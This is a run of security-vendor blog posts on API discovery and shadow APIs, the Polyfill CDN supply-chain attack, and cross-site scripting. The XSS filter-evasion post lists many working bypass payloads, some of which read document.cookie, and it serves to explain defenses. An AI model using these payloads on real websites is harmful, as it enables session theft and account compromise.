So that Optus API, that service elevator if you like, would allow anybody who figured out the URL to enter a customer number and get confidential information back, and just enumerate those customers without any limits. It was what we call a shadow API that was never intended to be accessible in production, so it didn’t have all the security controls we’d normally expect. And because it was this heavy-lifting service elevator, it allowed the attacker to automatically exfiltrate huge amounts of data that they probably wouldn’t be able to get so easily if they were, say, manually hacking a web form.

Could you talk a bit more about shadow APIs? We see that term thrown around a lot, so what practical security problems come up with shadow APIs and, more generally, when doing API security rather than securing that more visible part of applications?

Dan: It’s pretty easy for an API, which doesn’t have a user-visible manifestation, to be ignored and go out of date. With a website, a developer or security person can often simply click around and they will quickly notice if anything looks really sketchy. In fact, this is what we do automatically with our Predictive Risk Scoring. But APIs are a lot more difficult for that kind of quick analysis because they don’t have anything that you can directly interact with. They are a catalog of invisible operations that could be performed on a computer. And if you don’t keep track of what’s in that catalog and who’s allowed to do these operations, you can get shadow APIs creeping in, like these hidden service doors that might not be easy to find but aren’t locked or monitored for when somebody rattles all the locks and eventually gets in.

Frank: I’m glad you used the word “catalog” because those catalogs or inventories are really the sticking point for API security. So, ideally, you want to keep track of all your API specifications. In reality, they can live in various places and formats, formal and informal. You might have your “official” specs in OpenAPI (aka Swagger) files or Postman collections or your API management system like MuleSoft or whatever else you’re using, but you can also have proxy exports from Fiddler or even a Burp or Invicti scan. I’ve even seen them in Excel sheets. But all of these essentially need to be inventoried and tracked in order to be able to secure them and understand exactly what their context and purpose is.

 

In a perfect world, you would have everything tracked in your API gateways and management systems. Reality, though, tends to get a bit messy, and most companies I’ve seen and spoken to use a mix of different methods and systems.

Dan: It’s the sprawl that gets you. The unknown APIs that are out there are the ones that I would consider to be the riskiest. And that really speaks to the need for discovery because APIs tend to be organic; they tend to be created to connect to business opportunities, and they don’t always have a ton of oversight when they’re deployed. If you think of APIs as data pipes, it’s very hard to swap out a pipe that has active users from a lot of different places, so just like a pipe, they tend to get buried under the street, they do their job, and people forget about them. Until they burst, of course!

You mentioned discovery, which is a key part of Invicti’s API Security product and of the approach we’re proposing to help organizations secure their applications, APIs included. You have both been deeply involved in the intense development effort to design and implement that feature. To close out, could you talk a little about how Invicti’s API discovery works under the hood and how it fits into the wider API security picture?

Dan: Discovery is needed to find all those pipes that people put in overnight for an urgent project and didn’t necessarily catalog anywhere. And because organizations tend to keep their API information in different places, we decided to build out API discovery in layers. So we’re starting by finding all the spec files we can because these often live in predictable locations or in places that our crawler can get to, and we add those to all the specs that the organization knows and can deliver upfront. Then the next layer are API management platforms like MuleSoft that we can plug into and get more specs. And once we’ve found all the specs we could, we do traffic analysis to find APIs that are deployed and passing traffic but not cataloged.

 

In engineering terms, one of the really cool things we’ve built is the ability to discover APIs from real traffic. For example, one of our discovery features lets us plug into a Kubernetes cluster and analyze the traffic to find API requests. So if, heaven forbid, somebody quietly slipped into production that big water main that happens to make an entire project work, you could now find it by looking at traffic and say, “Oh, wow, you know what? We have these six sets of well-documented APIs, and then we’ve got this one that’s doing two million queries per day that is not on the map.” But we can now build that map, reconstruct the endpoints based on the traffic, build a regular OpenAPI spec file, and feed that to the scanner for testing.

Frank: That’s the other big piece of it—we’re doing discovery to find or reconstruct all those specs, and that is crucial because you can’t secure what you don’t know exists. But once you have all those specs, you need to make sure the APIs are not vulnerable to attack. This is kind of where tools that only focus on discovery can falter because once you have that inventory, you need to test it using some other tool. So at Invicti, we have what many consider to be the best DAST scanner in the world, and we’ve been using it to scan APIs for years, currently supporting 16 different API spec formats. Now that we have API discovery on the same platform, all those specs, known and discovered, can go straight to the scanner and be automatically tested for vulnerabilities without the need for additional tools.

Dan: And the cool thing is we can take many of the hundreds of security checks we designed for testing websites and apply them to scanning APIs. At a very high level, you can think of a DAST scan as just clicking through all the things on site, trying to open every single door, go through all the links, submit all the forms, and then mess around with parameter values until something pops and you get a little bit of cross-site scripting inside the browser. When we have an API spec, we can do something similar and attack all the normal places that we would if we came across this API in the course of a regular web browsing session.

 

But if you try to test an API and you just give it a low-effort payload, you can end up not getting deep enough into the app, and you just get this 400 error that says bad input. Usually, the really juicy code happens a little bit deeper than that, so during scans we’ll also try to mutate things and create representative payloads that match the input that is expected to get the scanner past input validation. You want to get to the point where you’re acquiring that SQL table, where you’re making that call out to the command-line tool—so it’s very important to get as proper-looking inputs as you possibly can. Some things like cross-site scripting probably don’t make sense outside a browser, but you can totally go through an API to steal an AWS identity token via SSRF.

Frank: I think it’s also important to add that we’re continuing work on discovering and testing APIs so we can find more endpoints, reconstruct more specs, find more vulnerabilities, and ultimately help our customers close those gaps faster.

Want to learn more about API Security, API discovery, and the Invicti platform? Check out our webinar to learn API security challenges, understand the benefits of comprehensive API discovery, and see the Invicti platform with API Security in action!

All in one place: Discovery and security testing across your APIs and applications
https://www.invicti.com/blog/web-security/invicti-api-security-with-api-discovery-and-vulnerability-testing/

API security and application security belong together—and with Invicti’s API Security offering, they come together on one platform that includes discovery, vulnerability testing, and more. Say goodbye to disjointed and inefficient tooling and hello to reduced risk, improved visibility, and lower costs. Learn how Invicti API Security works and why it makes all the difference.

Rock and roll. Food and drink. Web application security and API security. Some things are just better together, especially when keeping them separate means inefficiencies, costs, and increased risk. But while nobody has problems combining food and drink, putting API and application security on the same table has been a challenge—until now. With its API Security offering on the Invicti Platform, Invicti now boasts the industry’s first full menu of discovery and dynamic security testing across web applications and APIs to identify and test your entire web attack surface within a single solution.

But enough of the food metaphors. Research shows that organizations run an average of 26 APIs per app, yet only 25% accurately inventory their APIs. With the increasing number of APIs woven into web applications to speed up the development process, even just keeping tabs on APIs can be a major challenge—and that’s before you get to putting them through security testing in a way that keeps up with the pace of development. Compared to the UI part of applications, APIs are a security weak spot for many organizations, not least because of disjointed tools and processes that keep API security separated from the rest of AppSec.

To help solve this very real issue plaguing security and development teams, Invicti has launched a new capability within its market-leading API security and application security testing platform: multi-layered API discovery. With discovery bolstering your ability to find APIs, test them for vulnerabilities, and fix security issues before they become expensive security incidents, you get visibility across the entire UI and API attack surface to make AppSec proactive rather than purely reactive. Discovery and security testing. Applications and APIs. It’s like peaches and cream, only better. 

Solving the API and tool sprawl conundrum 

For an idea of the sheer numbers involved, there are hundreds of millions of APIs in existence, handling billions of requests each year. On the popular Postman API platform alone, there are over 120 million API collections, and just from May 2023 to May 2024, 1.29 billion API requests were created. There are APIs everywhere, both managed and unmanaged, and more are being created every minute, presenting a problem for development and security alike: how do you manage and secure all the APIs your organization is running? How can you know your realistic attack exposure? And how do you secure every part of the total attack surface if you can never be certain what you’re exposing? This dire need for visibility fuels tool sprawl and workflow inefficiencies.

Invicti’s new API discovery capability adds that visibility as part of our API Security solution, making it faster and easier to curb the risk from vulnerable APIs deployed in modern web services. Because each application environment is different, Invicti API Security uses a layered approach to API discovery, combining several methods in one tool:

  • A zero-configuration option to get you up and running fast, helping you identify API specifications by scanning your cloud environments for API specification files in known or otherwise typical locations
  • Integrations with popular API management systems so your teams can always sync the latest API specifications 
  • Analysis of network API traffic in container deployments such as Kubernetes clusters to identify API calls and reconstruct API definitions based on the observed traffic

All these layers of discovery are integrated into one Invicti Platform that covers API and web application security, increasing coverage and visibility of your attack surface without throwing yet more tools into the mix. “As tool sprawl and budgetary constraints grow, CISOs can rely on the Invicti solution to address the growing API security concerns in addition to reducing their teams’ tooling complexity,” explains Invicti’s CEO Neil Roseman. 

Now that the Invicti Platform comes equipped with more comprehensive API discovery capabilities, the combined coverage of web application and API security means leaders don’t have to worry about adding to increasingly complex tool sprawl, breaking their budget, or sacrificing accuracy. In fact, CISOs and engineering leaders can look to Invicti API Security to help reverse tool sprawl and shift their focus to other critical business needs.

How automated API discovery fits into the Invicti Platform

Things move fast in development. Agile methodologies and the growing use of AI assistants have dramatically increased the speed and volume of code production, with security often taking a back seat in the rush to bring new features and products to market. Building automated security testing into development pipelines can be a major stumbling block, with subpar tooling and inadequate integration often dragging security efforts down or leaving them by the wayside.

To make efficient security testing a routine part of application and API development, the Invicti Platform was designed with accuracy and automation in mind. Features like proof-based scanning help to confirm exploitable vulnerabilities without the risk of false positives, while a wide array of integrations with industry-standard development and collaboration tools ensures that vulnerability reports are automatically delivered to the right people at the right time. 

The addition of API discovery to the Invicti Platform bridges the gap between known specifications and the real-world attack surface, helping you uncover and test applications and APIs that would otherwise have flown under the radar. Once you’ve defined, discovered, and prioritized your app and API assets, Invicti’s DAST-based approach to vulnerability testing provides technology-agnostic coverage without sacrificing accuracy. 

Putting discovery and security testing within a single cohesive platform for application and API security reduces tool sprawl and gives you unprecedented visibility into the actual security status of your application environments. And with everything under one roof, API discovery can become a seamless and routine part of your wider application security process, ensuring that you have the most accurate information you can get about your APIs.

How API security and application security come together on the Invicti Platform

Deeper insights for proactive risk management and security

Better discovery, accurate testing, and fully integrated remediation are all part of proactive application security efforts that translate into fewer reactive fire drills once in production. Catching issues with web applications and APIs early on in the development process and within a single integrated platform means that both security and development teams are saving time, sanity, and money they would otherwise have lost on chasing security issues using a motley array of disparate tools. 

Being proactive and knowing what to prioritize for testing and remediation can make a world of difference in how effective your security strategy is. Invicti’s recent addition of Predictive Risk Scoring to the Invicti Platform provides advanced prioritization intel to help you decide what to scan and fix first. When deployed with API discovery and web application security testing all in one package and integrated with your existing toolchains, Invicti’s suite of solutions becomes your go-to AppSec platform. 

Learn more about Invicti’s API Security solution, now complete with discovery

Join our webinar to see Invicti API Security in action!

The post All in one place: Discovery and security testing across your APIs and applications appeared first on Invicti.

]]>
Invicti Expands App Security Platform with Comprehensive API Security https://www.invicti.com/blog/news/invicti-expands-appsec-platform-api-security/ Tue, 16 Jul 2024 13:00:25 +0000 https://www.invicti.com/?p=54874 Invicti Security has announced the launch of Invicti API Security, combining comprehensive, multi-layered API discovery with proactive security testing on a single platform that spans applications and APIs.

The post Invicti Expands App Security Platform with Comprehensive API Security appeared first on Invicti.

]]>
Comprehensive API discovery now available in a single web application and API security solution

AUSTIN, Texas—(July 16, 2024)—Invicti, the leading provider of application security testing solutions, today announced Invicti API Security, merging comprehensive API discovery with proactive security testing into a single solution.

The growth of service-based architectures has driven an explosion in APIs, creating yet another expanding attack surface for security teams to address. As development teams embrace the productivity benefits of AI code assistants, API creation accelerates further. But while AI code assistants are boosting developer productivity, they cannot yet generate secure application code or secure APIs consistently, propagating the risk from vulnerable APIs deployed into today’s web services.

According to ESG’s report Securing The API Attack Surface, 76% of organizations report having an average of 26 APIs per application deployed. Many of these APIs are undocumented and unmonitored, so the security challenge is now about confidently and quickly finding APIs, testing them for vulnerabilities, and performing remediation. With Invicti API Security, organizations can realize comprehensive API discovery alongside proactive API security testing. 

Invicti API Security includes multiple discovery methods to enable comprehensive identification of known and undocumented APIs, including:

  • Zero-configuration discovery to identify API specifications, scanning cloud environments for accessible paths 
  • API management system integrations to fetch and sync accurate and latest API specifications into inventory
  • Network API traffic analysis to identify and reconstruct API calls into API definition files based on observed traffic

“With the Invicti Platform’s extensive API discovery capabilities, we are able to deliver a tool consolidation option, combining web application and API security into a single solution,” said Neil Roseman, CEO at Invicti. “As tool sprawl and budgetary constraints grow, CISOs can rely on the Invicti solution to address the growing API security concerns in addition to reducing their team’s tool complexity.”

For more than 15 years, Invicti has provided web application security testing with industry-leading coverage, accuracy, speed, and scale. The combination of continuous automated discovery, proof-based scanning to verify critical vulnerabilities for developers, and the recently added Predictive Risk Scoring to advance prioritization efforts provides customers with a unique set of benefits. These web application security benefits can now be deployed together with API discovery and security testing.

“Our research shows that security leaders are increasingly concerned with API security and their ability to secure their customers’ sensitive data. This is because as developers build feature-rich applications with integrations and communications to resources, the APIs, especially unknown shadow APIs, create rapidly proliferating attack surfaces,” said Melinda Marks, Practice Director, Cybersecurity at ESG. “The Invicti approach applies a multi-layer discovery method to thoroughly identify APIs, helping organizations deliver secure applications.”

Invicti API Security is available to Invicti customers across both the Acunetix and Invicti (formerly Netsparker) product lines to extend their use of the Invicti Platform. New customers can purchase the product as a combined web application and API security solution or as a standalone API Security option.

About Invicti Security

Invicti Security—which acquired and combined AppSec leaders Acunetix and Netsparker—is on a mission: application security with zero noise. An AppSec leader for more than 15 years, Invicti delivers continuous web application and API security, designed to be both reliable for security and practical for development while serving critical compliance requirements. Customers choose the Invicti platform to leverage DAST, SCA, and IAST solutions to better secure their environments and ultimately reduce risk across their web applications and APIs. Invicti is headquartered in Austin, Texas, and has employees in over 11 countries, serving more than 4,000 organizations around the world. For more information, visit our website or follow us on LinkedIn.

###

Media Contact

Anne Harding
anne@themessagemachine.com
+44 7887 682943

The post Invicti Expands App Security Platform with Comprehensive API Security appeared first on Invicti.

]]>
XSS filter evasion: Why filtering doesn’t stop cross-site scripting https://www.invicti.com/blog/web-security/xss-filter-evasion/ Thu, 11 Jul 2024 10:44:30 +0000 https://www.invicti.com/blog/uncategorized/xss-filter-evasion/ XSS filter evasion techniques allow attackers to get past cross-site scripting filters. This post lists some of the most common filter bypass methods, shows why filtering alone cannot be trusted to stop XSS attacks, and discusses recommended ways to prevent cross-site scripting.

The post XSS filter evasion: Why filtering doesn’t stop cross-site scripting appeared first on Invicti.

]]>
XSS filter evasion covers many hundreds of methods that attackers can use to bypass cross-site scripting (XSS) filters. A successful attack requires both an XSS vulnerability and a way to inject malicious JavaScript into web page code executed by the client to exploit that vulnerability. The idea of XSS filtering is to prevent attacks by finding and blocking (or stripping away) any code that looks like an XSS attempt. The problem is that there are countless ways of bypassing such filters, so filtering alone can never fully prevent XSS. Before going into just a few of the thousands of known filter evasion methods, let's start with a quick look at the concept and history of XSS filtering.

What is XSS filtering and why is it so hard to do?

At the application level, XSS filtering means user input validation performed specifically to detect and prevent script injection attempts. Filtering can be done locally in the browser, during server-side processing, or by a web application firewall (WAF). For many years, server-side filtering was the most common approach, but eventually browser vendors started building in their own filters, called XSS auditors, to prevent at least some cross-site scripting attempts from reaching the user.

The idea was that the filter scans code arriving at the browser and looks for typical signs of XSS payloads, such as suspicious <script> tags in unexpected places. Common approaches to filtering included complex regular expressions (regex) and code string blacklists. If potentially dangerous code was found, the auditor could block either the entire page or just the suspicious code fragment. Both reactions had their disadvantages and could even open up new vulnerabilities and attack vectors, which is why integrated browser filters soon went away.
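
To see why this approach was doomed, consider a minimal sketch of a blacklist-style filter written in JavaScript (purely illustrative, not any browser’s actual auditor code) and one of the countless payloads that walks straight past it:

function naiveXssFilter(input) {
  // Reject anything containing an obvious script tag
  if (/<script\b[^>]*>/i.test(input)) {
    return "";
  }
  return input;
}

naiveXssFilter("<script>alert(1)</script>");    // blocked, returns ""
naiveXssFilter("<img src=x onerror=alert(1)>"); // no script tag, passes through unchanged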

All approaches to filtering have their limitations. XSS filtering by the browser is only effective against reflected XSS attacks, where the malicious code from the request is directly reflected in the response sent to the client browser. Client-side filters and auditors are no use when the injected code never appears in a response that can be matched against the request, which is the case for both stored XSS and DOM-based XSS. Server-side and WAF-based filters can help against reflected and stored XSS but are helpless against DOM-based attacks since these happen entirely in the browser and the exploit code never arrives at the server. On top of that, trying to do XSS filtering in the web application itself is extremely complicated, can have unintended consequences, and requires constant maintenance to keep up with new exploits.

How attackers bypass cross-site scripting filters

At best, XSS filtering adds an extra level of difficulty to the work of attackers crafting XSS attacks, as any injected script code first has to get past the filters. While XSS attacks generally target application vulnerabilities and misconfigurations, XSS evasion techniques exploit gaps in the filtering performed by the browser, server, or WAF. 

There are numerous evasion approaches that can be combined to build countless bypasses. The common denominator is that they abuse product-specific implementations of web technology specifications. A large part of any browser’s codebase is devoted to gracefully handling malformed HTML, CSS, and JavaScript to try and fix code before presenting it to the user. XSS filter evasion techniques take advantage of this complex tangle of languages, specifications, exceptions, and browser-specific quirks to slip malicious code past the filters.

Examples of XSS filter bypasses

Filter evasion attempts can target any aspect of web code parsing and processing, so there are no rigid categories here and the list is always open. The most obvious script tag injections will generally be rejected out of hand, but there are many more sophisticated methods, and you can also use other HTML tags as injection vectors. Event handlers, in particular, are often used to trigger script loading, as they can be tied into legitimate user actions and are hard to just remove without breaking functionality. Commonly exploited handlers include onerror, onclick, and onfocus, but the majority of supported event handlers can be used as XSS vectors.
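
For instance, one well-known vector (shown here as a generic illustration in the style of the examples below) uses the autofocus attribute to fire the element’s own onfocus handler without any user interaction at all:

<input onfocus=alert('Successful XSS') autofocus>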

To give you some idea of the huge number of ways to bypass an XSS filter, the long list below is still only a tiny fraction of the tools available to attackers (see the OWASP Cheat Sheet for a scarily detailed list based on RSnake’s original cheat sheet). While this post is definitely not a complete reference, and most examples will only work in specific scenarios, anyone familiar with JavaScript should be aware that many such quirks exist alongside what you’d normally consider valid syntax.

Character encoding tricks

To bypass filters that rely on scanning text for specific suspicious strings, attackers have a variety of ways to encode one or many characters. Encodings can also be nested, so you’re encoding the same string many times, potentially using different methods. The choice of encoding is also dependent on the context, as browsers encode and decode characters differently in different places (for example, URL encoding is only supported for URL values in href tags). The following examples show just a few possibilities, and that’s without even resorting to Unicode tricks.

To bypass filters that directly search for a string like javascript:, some or all characters can be written as HTML entities using ASCII codes:

<a href="&
#106;avascript:alert('Successful XSS')">Click this link!</a>

To evade filters that look for HTML entity codes using a pattern of &# followed by a number, you can use ASCII codes but in hexadecimal encoding:

<a href="&
#x6A;avascript:alert(document.cookie)">Click this link!</a>

Base64 encoding can be used to obfuscate attack code. This example also displays an alert saying “Successful XSS”:

<body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">

All encoded character entities can be from 1 to 7 numeric characters, with any initial padding zeroes being ignored. This gives each entity in each encoding several extra zero-padded versions (OWASP’s XSS filter evasion cheat sheet lists no less than 70 valid ways of encoding just the < character). Also, note that semicolons are not actually required at the end of entities:

<a href="&
#x6A;avascript&#0000058&#0000097lert('Successful XSS')">Click this link!</a>

Character codes can be used to hide XSS payloads:

<iframe src=# onmouseover=alert(String.fromCharCode(88,83,83))></iframe>

Whitespace embedding

Browsers are very permissive when it comes to whitespace in HTML and JavaScript code, so embedded non-printing characters are another way to mess with filters. Note that most browsers no longer fall for such whitespace tricks, though they can still work in some contexts.

Tab characters are ignored when parsing code, so they can be used to break up keywords, as in this img tag (this one won’t work in a modern browser):

<img src="java	script:al	ert('Successful XSS')">

The tabs can also be encoded:

<img src="java&
#x09;script:al&
#x09;ert('Successful XSS')">

Just like tabs, newlines and carriage returns are also ignored and can be additionally encoded:

<a href="jav&
#x0A;ascript:&
#x0A;ale&
#x0D;rt('Successful XSS')">Visit google.com</a>

Some filters may look for "javascript: or 'javascript: and will not expect whitespace after the quote. In reality, any number of spaces and control characters with ASCII codes 1 through 32 (decimal) are valid in that position:

<a href="  &#x8; &#23;   javascript:alert('Successful XSS')">Click this link!</a>

Tag manipulation

If the filter simply scans the code once and removes specific tags, such as <script>, nesting them inside other tags will leave valid code after they are removed:

<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>

Spaces between attributes can often be omitted. Also, a slash is a valid separator between a tag name and an attribute name, which can be useful for evading whitespace restrictions on inputs. Note that the following string contains no whitespace at all:

<img/src="funny.jpg"onload=javascript:eval(alert('Successful&#32XSS'))>

And another example without any whitespace, this time using the svg tag:

<svg/onload=alert('XSS')>

If parentheses or single quotes are disallowed, that’s not a problem—replacing them with backticks is still valid JavaScript:

<svg/onload=alert`xss`>

Evasion attempts can also exploit browser efforts to interpret and complete malformed tags. Here’s an example that omits the href attribute and quotes (most other event handlers can also be used): 

<a onmouseover=alert(document.cookie)>Go to google.com</a>

And an extreme example of a completely wrecked img tag that loads a script once repaired by the browser: 

<img """><script src=xssattempt.js></script>">

Extra fun with Internet Explorer

Before there was Chrome or Firefox (and definitely before Edge), there was almost exclusively Internet Explorer. Because of its many non-standard implementations and quirks related to other Microsoft technologies, IE provided some unique filter evasion vectors. And before you dismiss it as an outdated and marginal browser, remember that some legacy enterprise applications may continue to rely on IE-specific features.

The majority of XSS checks look for JavaScript, but Internet Explorer up to IE10 would also accept VBScript:

<a href='vbscript:MsgBox("Successful XSS")'>Click here</a>

Another unique IE feature is dynamic properties, which allow script expressions to be used as CSS values:

body { color: expression(alert('Successful XSS')); }

The rare and deprecated dynsrc attribute can provide another vector: 

<img dynsrc="javascript:alert('Successful XSS')">

Use backticks when you need both double and single quotes: 

<img src=`javascript:alert("The name is 'XSS'")`>

In older IE versions, you could also include a script disguised as an external style sheet: 

<link rel="stylesheet" href="http://example.com/xss.css">

Cabinet of curiosities: Legacy methods

Web technology specifications and implementations change so often that XSS filter bypasses naturally have a short shelf life. To end this article, here are some curiosities that shouldn’t work today but provide a glimpse into the many edge cases that can creep in when implementing new specs while also maintaining backward compatibility.

Injection into the background image attribute:

<body background="javascript:alert('Successful XSS')">

Same idea but using a style:

<div style="background-image:url(javascript:alert('Successful XSS'))">

Images without any img tags and with script code instead of the image file:

<input type="image" src="javascript:alert('Successful XSS')">

Script injected as the target URL for a meta tag redirect. In some older browsers, this would display an alert by evaluating the Base64-encoded JavaScript code:

<meta http-equiv="refresh" content="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

And as a final curiosity—did you know that, once upon a time, it was possible to hide an XSS payload using UTF-7 encoding?

<head><meta http-equiv="content-type" content="text/html; charset=utf-7"></head>
+ADw-script+AD4-alert('xss');+ADw-/script+AD4-

How can you protect your applications from cross-site scripting if not by filtering?

While web application firewalls can provide some XSS filtering, it’s worth keeping in mind that this is, at best, only one of many layers of protection. With hundreds of ways of evading filters and new vectors appearing all the time, filtering alone cannot prevent XSS. Combined with the potential for breaking valid scripts in complex modern applications, this is part of the reason why browser vendors are moving away from filtering.

By writing secure code that is not susceptible to XSS attacks, developers can have far more effect on application and user security than any filters. On the application level, this means treating all user-controlled inputs as untrusted by default and correctly applying context-sensitive escaping and encoding. On the HTTP protocol level, the main weapons against cross-site scripting are properly configured Content Security Policy (CSP) headers and other HTTP security headers.
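
To make the encoding part concrete, here is a minimal sketch of output encoding for an HTML body context (the function and variable names are illustrative; in practice, prefer the context-aware encoding helpers built into your framework or templating library):

function encodeForHtml(value) {
  // Replace HTML metacharacters with entities so they render as text
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// An injected payload is now displayed as text, not executed
element.innerHTML = "You searched for: " + encodeForHtml(userQuery);

Note that this helper is only safe for HTML body content; values placed into attributes, URLs, or script blocks each need their own encoding rules.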

With these best practices in place, you then also need to regularly test every site, app, and API to make sure that new code, updates, and configuration changes don’t result in exploitable XSS vulnerabilities. Running an enterprise-grade web vulnerability scanner that checks for vulnerabilities and security misconfigurations as part of a continuous process is thus an essential part of application security hygiene.

The post XSS filter evasion: Why filtering doesn’t stop cross-site scripting appeared first on Invicti.

]]>
Polyfill supply chain attack: What to do when your CDN goes evil https://www.invicti.com/blog/web-security/polyfill-supply-chain-attack-when-your-cdn-goes-evil/ Thu, 27 Jun 2024 17:33:26 +0000 https://www.invicti.com/?p=54044 The Polyfill library is just one of many half-forgotten dependencies that the web application world relies on. When its domain changed owners, the CDN serving the library started injecting malware into the code—eventually putting visitors of the 100,000+ sites that use Polyfill at risk of malicious code. Learn how the attack unfolded, why it was possible, and how to mitigate it.

The post Polyfill supply chain attack: What to do when your CDN goes evil appeared first on Invicti.

]]>

What you need to know:


  • On June 25, 2024, the cdn.polyfill.io domain started injecting malware into the popular polyfill.js library, estimated to be used by over 100,000 sites.
  • On June 26, Cloudflare started automatically rewriting requests to cdn.polyfill.io and serving up their safe mirrored copy of the library.
  • As of June 27, Invicti products include dedicated security checks to flag any use of polyfill.io in applications.
  • The polyfill.io domain has been taken down (though it may still be cached) and there is no immediate risk of compromise, but all sites and applications that loaded scripts from polyfill.io should remove them as a precaution since the domain is now treated as malicious.
  • A best practice to protect against similar attacks in the future is to use the Subresource Integrity (SRI) feature when loading external dependencies.

The action-packed story of polyfill.io

The open-source Polyfill project was created a decade ago as a convenient aggregation of polyfills for website and web application development. In February 2024, the polyfill.io domain was bought by a suspicious company named Funnull, most likely of Chinese origin. Subsequently, there were some reports of cdn.polyfill.io injecting malware when loaded on mobile devices, but any complaints were quickly deleted from the GitHub repository.

The full-scale supply chain attack was reported on June 25th, with cdn.polyfill.io injecting malicious code into websites that loaded scripts from this domain. Over 100,000 sites were found to be loading poisoned polyfills, serving up a variety of malware to browsers. Major providers such as Google and Cloudflare were quick to respond to mitigate the threat. Cloudflare, in particular, had long been suspicious of the new owners of polyfill.io and had created its own copy of the Polyfill repo. When the attacks started, Cloudflare started rewriting requests to cdn.polyfill.io to point at its own, safe mirror of the repo. Both Cloudflare and Fastly have been providing a safe mirror of Polyfill since February.

As of this writing, the polyfill.io domain has been taken down completely by its operator, eliminating the immediate risk of attack and buying time to remove any references to cdn.polyfill.io from applications that loaded scripts from that domain.

Polyfills are helper scripts (usually JavaScript loaded from a web source) that provide modern functionality for older browser versions that might not support a specific feature. They were a popular tool in the days of limited cross-browser compatibility but are much less useful with modern browsers that implement specifications in a more standardized way. The original creator of the Polyfill project has been discouraging the use of polyfills for several years now, saying they are unnecessary and potentially risky.

Another link in the web application supply chain

“The Polyfill incident serves as yet another illustration of how complex and vulnerable the web application security supply chain has become, particularly in the JavaScript ecosystem on the client side,” said Dan Murphy, Chief Architect at Invicti Security. “The difference here compared to similar high-profile attacks is that malicious actors simply took control of a widely-used project instead of quietly exploiting a vulnerability somewhere in the shaky pyramid of web dependencies.”

Many scripts are now loaded via content delivery networks for improved performance, making CDNs another link in the supply chain and thus a potential target. Without some way of checking if your dependency has been tampered with, you are effectively trusting the CDN operator with your application security.

Using Subresource Integrity to prevent the next Polyfill

Luckily, there is a clever browser feature that can save you if an attacker takes over the CDN serving one of your dependencies: Subresource Integrity (SRI) checking. Most modern websites work with a very specific set of library versions: once a version has been imported, that’s the one you use until you decide to upgrade to a newer one. The same goes for publishing: once a version is released, it is generally never modified, and any changes go into a new version that you can adopt or ignore. In other words, once you have included the file in your application, it should never change, and if it does, something weird is going on.

Enter the Subresource Integrity browser feature that lets you ensure a resource hasn’t changed since you included it in your application. To use SRI, you need to create a hash (sha256, sha384, or sha512) of the file you’re loading, and online tools are available to do it automatically for you. You then simply put the hash in the integrity attribute of your script or link tag, as in this sha384 example for jQuery:

<script src="https://code.jquery.com/jquery-2.1.4.min.js" integrity="sha384-R4/ztc4ZlRqWjqIuvf6RX5yb/v90qNGx6fS48N0tRxiGkqveZETq72KgDVJCp2TC" crossorigin="anonymous"></script>

Once this is done, the resource will load as normal. If anything changes on the server side, however, such as malicious code being added, the stored hash will no longer match the hash of the incoming script or stylesheet, and browsers will refuse to load the resource. This protects you not only from malicious tampering but also from CDN-side issues such as misconfigurations or switch-ups that may be hard to debug while impacting the functionality of your website.
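
If you prefer not to rely on an online generator, you can compute the hash yourself. Here is one way to do it, sketched in Node.js (the file name is just an example):

const crypto = require("crypto");
const fs = require("fs");

// Hash the exact bytes of the file you will be loading
const body = fs.readFileSync("jquery-2.1.4.min.js");
const digest = crypto.createHash("sha384").update(body).digest("base64");
console.log("sha384-" + digest); // paste this value into the integrity attribute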

Security checks in Invicti products to verify SRI and find Polyfill usage

Invicti products include checks to warn you when a site is not using Subresource Integrity (SRI not implemented, reported at Best-practice severity, or Informational severity for the Acunetix equivalent) or when an existing SRI hash is wrong (SRI hash invalid, reported at Low severity).

Both Acunetix and Invicti products now include dedicated security checks to identify any uses of polyfill.io in scanned websites and applications. These are available directly in all Acunetix editions (except Acunetix 360), while Invicti and Acunetix 360 users can enable these custom checks by contacting support.

The post Polyfill supply chain attack: What to do when your CDN goes evil appeared first on Invicti.

]]>
How to prevent XSS attacks https://www.invicti.com/blog/web-security/how-to-prevent-xss-attacks/ Thu, 20 Jun 2024 15:57:43 +0000 https://www.invicti.com/?p=53851 Cross-site scripting vulnerabilities and attacks are not going away any time soon, but with the right combination of security headers, secure coding practices, modern application frameworks, and regular vulnerability testing, you can dramatically reduce the risk of successful XSS attacks against your applications and APIs.

The post How to prevent XSS attacks appeared first on Invicti.

]]>
JavaScript has come a long way since being only lightly sprinkled on static HTML web pages to make them more dynamic. It is now a crucial building block of modern web applications, making cross-site scripting (XSS) a commonplace security vulnerability—and also making XSS attacks that much more impactful if they succeed.

No longer restricted to providing some additional client-side functionality via a handful of scripts, JavaScript code can now run across the entire application stack, up to and including the server side with Node.js. Add to that the plethora of external dependencies loaded at runtime by any self-respecting site and you’re dealing with a tangled web of interconnected scripts—some of which could be vulnerable or even malicious.

Cross-site scripting is a complex and messy area of web application security, which makes it all but impossible to prevent every single attack. (As a side note, while JavaScript is by far the most popular attack vehicle, XSS is also possible with other script types, even including XSS in CSS.) Fortunately, most XSS vulnerabilities and resulting attacks can be prevented by following a handful of security best practices in development and deployment. Let’s start with a cut-out-and-keep checklist before going deeper into selected aspects of XSS.

XSS attack prevention checklist

Follow these best practices to prevent the vast majority of cross-site scripting attacks:

  • Set HTTP security headers: Define the right Content Security Policy (CSP) HTTP response headers to stop malicious scripts from being loaded in the first place (see the example header after this checklist).
  • Treat all inputs as untrusted: Always sanitize user inputs (including API inputs and outputs), perform input validation, and use context-dependent output encoding.
  • Use secure coding practices and tools: Avoid inline scripts and correctly use any XSS-resistant features provided by your application framework, such as automatic encoding functions.
  • Run regular vulnerability testing: Periodically rescan your websites and applications with an up-to-date web vulnerability scanner to catch vulnerabilities in time.

(Note that filtering is deliberately not listed here—read on to learn why you can’t trust XSS filtering.)
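
As promised in the first checklist item, here is an illustrative CSP response header (the CDN hostname is a placeholder). Because it omits unsafe-inline, it blocks inline scripts and event handlers, and it only allows external scripts from your own origin and one explicitly trusted host:

Content-Security-Policy: default-src 'self'; script-src 'self' https://scripts.example.com; object-src 'none'; base-uri 'none'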

The complex world of cross-site scripting vulnerabilities

